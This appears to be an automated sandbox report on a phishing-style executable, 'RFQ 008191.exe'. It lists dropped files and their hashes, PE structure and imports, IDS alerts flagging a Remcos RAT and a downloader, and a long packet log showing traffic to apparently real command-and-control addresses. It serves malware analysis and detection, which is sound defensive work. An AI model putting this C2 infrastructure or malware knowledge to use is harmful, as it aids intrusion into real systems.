                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ge0roe3.a5g.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3uibhk5.syd.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpvxsmjl.smj.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\bhvA440.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9f59b020, page size 32768, DirtyShutdown, Windows version 10.0
                                                                  Category:dropped
                                                                  Size (bytes):15728640
                                                                  Entropy (8bit):0.10103965264833503
                                                                  Encrypted:false
                                                                  SSDEEP:1536:GSB2jpSB2jFSjlK/4w/ZweshzbOlqVquesezbgl4KCIeszO/Zk3EufY:Ga6amUueqtDiu6b
                                                                  MD5:05ED31CC5A8F6E5591DCBD13F044B588
                                                                  SHA1:E224223FD7D82169BE2B50FA9C5AA514F6EBBC34
                                                                  SHA-256:53CEC4FD5E5126208BA267073853ACD92BF70203157D20DCA7151B98882A914D
                                                                  SHA-512:1F82B82F706EE8ECFA1860E1F81334FAE5D95951B8731A9DE01166DE3925F7363580C78774E405842054E359E8631A9BF1FAC2A8BF22E3F8DCE523D3A0008C5F
                                                                  Malicious:false
                                                                  Preview:.Y. ... ...................':...{........................N......4...{_..5...{..h.P.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{......................................5...{..................."...5...{C..........................#......h.P.....................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                  Category:modified
                                                                  Size (bytes):2
                                                                  Entropy (8bit):1.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:Qn:Qn
                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                  Malicious:false
                                                                  Preview:..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.828737109365321
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:RFQ 008191.exe
                                                                  File size:795'710 bytes
                                                                  MD5:82ba32e4800897e8bafb32990d29f60a
                                                                  SHA1:21b724df29b7ddbcd88849e7ad6ab12a4d266c4c
                                                                  SHA256:777441225b9d294baca2f689286a1f70a0fc28007e86cf1cc099c71ee1d826f2
                                                                  SHA512:7e741fab4e31223a967c4194f31e4fd592b75dc14dde4c72c3fbd5efb28f312807f886290fa8a227037890375d3ada7597857138f4df4d905b0ae4ca7b906101
                                                                  SSDEEP:12288:UXqlVfD6qKMwy8kjKsge8jLAMsnI8c78pc+HeV4PRklT3we+doWVkeehown:UXqzrTK5XsgervnIac+Hm4QT31V1hown
                                                                  TLSH:080502917691123FC15D813BB16B2B71EBAB9F9852776802A223FF0F75367613E08643
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".....

                                                                  File Icon

                                                                  Icon Hash:71868ed4e8b04d49

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40351c
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x660843F3 [Sat Mar 30 16:55:15 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 000003F8h
                                                                  push ebp
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  pop edi
                                                                  xor ebp, ebp
                                                                  push 00008001h
                                                                  mov dword ptr [esp+20h], ebp
                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                  mov dword ptr [esp+14h], ebp
                                                                  call dword ptr [004080A4h]
                                                                  mov esi, dword ptr [004080A8h]
                                                                  lea eax, dword ptr [esp+34h]
                                                                  push eax
                                                                  mov dword ptr [esp+4Ch], ebp
                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                  mov dword ptr [esp+00000150h], ebp
                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                  call esi
                                                                  test eax, eax
                                                                  jne 00007FFA8961CF2Ah
                                                                  lea eax, dword ptr [esp+34h]
                                                                  mov dword ptr [esp+34h], 00000114h
                                                                  push eax
                                                                  call esi
                                                                  mov ax, word ptr [esp+48h]
                                                                  mov ecx, dword ptr [esp+62h]
                                                                  sub ax, 00000053h
                                                                  add ecx, FFFFFFD0h
                                                                  neg ax
                                                                  sbb eax, eax
                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                  not eax
                                                                  and eax, ecx
                                                                  mov word ptr [esp+00000148h], ax
                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                  jnc 00007FFA8961CEF8h
                                                                  and word ptr [esp+42h], 0000h
                                                                  mov eax, dword ptr [esp+40h]
                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                  mov dword ptr [00429AD8h], eax
                                                                  xor eax, eax
                                                                  mov ah, byte ptr [esp+38h]
                                                                  movzx eax, ax
                                                                  or eax, ecx
                                                                  xor ecx, ecx
                                                                  mov ch, byte ptr [esp+00000148h]
                                                                  movzx ecx, cx
                                                                  shl eax, 10h
                                                                  or eax, ecx
                                                                  movzx ecx, byte ptr [esp+0000004Eh]

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x1f780.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x65760x66001e4066ed6e7440cc449c401dfd9ca64fFalse0.6663219975490197data6.461246686118911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xa0000x1fb380x6002e1d49b2855a89e6218e118f0c182b81False0.5026041666666666data4.044293204800279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x2a0000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x4d0000x1f7800x1f8008e8a3197e2686a2d1e03890bd5970dadFalse0.5309554811507936data6.149455977169068IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x4d2f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.25881343901573406
                                                                  RT_ICON0x5db200x9f42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9983811626195732
                                                                  RT_ICON0x67a680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4413900414937759
                                                                  RT_ICON0x6a0100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.5112570356472795
                                                                  RT_ICON0x6b0b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6077868852459016
                                                                  RT_ICON0x6ba400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.650709219858156
                                                                  RT_DIALOG0x6bea80x100dataEnglishUnited States0.5234375
                                                                  RT_DIALOG0x6bfa80x11cdataEnglishUnited States0.6056338028169014
                                                                  RT_DIALOG0x6c0c80xc4dataEnglishUnited States0.5918367346938775
                                                                  RT_DIALOG0x6c1900x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0x6c1f00x5adataEnglishUnited States0.7888888888888889
                                                                  RT_VERSION0x6c2500x1f0MS Windows COFF PowerPC object fileEnglishUnited States0.5504032258064516
                                                                  RT_MANIFEST0x6c4400x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                  Imports

                                                                  DLLImport
                                                                  ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                  SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                  ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                  USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                  GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                  KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-10T16:28:58.760234+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749784212.162.149.8980TCP
                                                                  2024-12-10T16:29:02.256338+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749793212.162.149.912404TCP
                                                                  2024-12-10T16:29:04.459493+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749799212.162.149.912404TCP
                                                                  2024-12-10T16:29:04.654488+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.749801178.237.33.5080TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 10, 2024 16:28:57.483438015 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:57.603513002 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:57.603615999 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:57.611057043 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:57.732048988 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.760035038 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.760165930 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.760178089 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.760234118 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.760736942 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.760750055 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.760807037 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.789952040 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.790019989 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.790045023 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.790059090 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.790096045 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.790497065 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.790509939 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.790549994 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.880290031 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.880419016 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.880501986 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.952673912 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.952716112 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.952758074 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.954518080 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.955153942 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.955290079 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.955333948 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.964070082 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.964133024 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.964153051 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.964198112 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.971661091 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.971800089 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.971885920 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.971931934 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.980401039 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.980539083 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.980602026 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.989202023 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.990223885 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.990291119 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.990364075 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.990401030 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:58.998632908 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.998703957 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:58.998758078 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.007807016 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.007838964 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.007900000 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.015362024 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.015530109 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.015585899 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.024002075 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.024174929 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.024225950 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.033468008 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.034595966 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.073447943 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.073476076 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.073581934 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.144592047 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.144610882 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.144654036 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.144654036 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.147494078 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.147644997 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.147685051 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.147744894 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.152820110 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.152940035 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.153709888 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.153884888 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.158807993 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.158822060 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.158989906 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.162254095 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.162269115 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.162323952 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.166523933 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.166619062 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.166692972 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.166745901 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.173300028 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.173393011 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.174206972 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.174273014 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.177180052 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.177335024 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.177381039 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.180593014 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.180715084 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.180856943 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.184716940 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.186630964 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.186825991 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.187119961 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.187184095 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.191975117 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.192508936 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.192574024 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.196644068 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.196846962 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.197026014 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.201765060 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.201778889 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.201833010 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.206542969 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.206710100 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.206773996 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.210196018 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.210211039 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.210273027 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.210304022 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.213892937 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.214015961 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.214090109 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.217951059 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.217966080 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.218031883 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.221460104 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.221618891 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.221687078 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.225718021 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.225733995 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.225807905 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.228554964 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.228697062 CET8049784212.162.149.89192.168.2.7
                                                                  Dec 10, 2024 16:28:59.228790045 CET4978480192.168.2.7212.162.149.89
                                                                  Dec 10, 2024 16:28:59.232135057 CET8049784212.162.149.89192.168.2.7
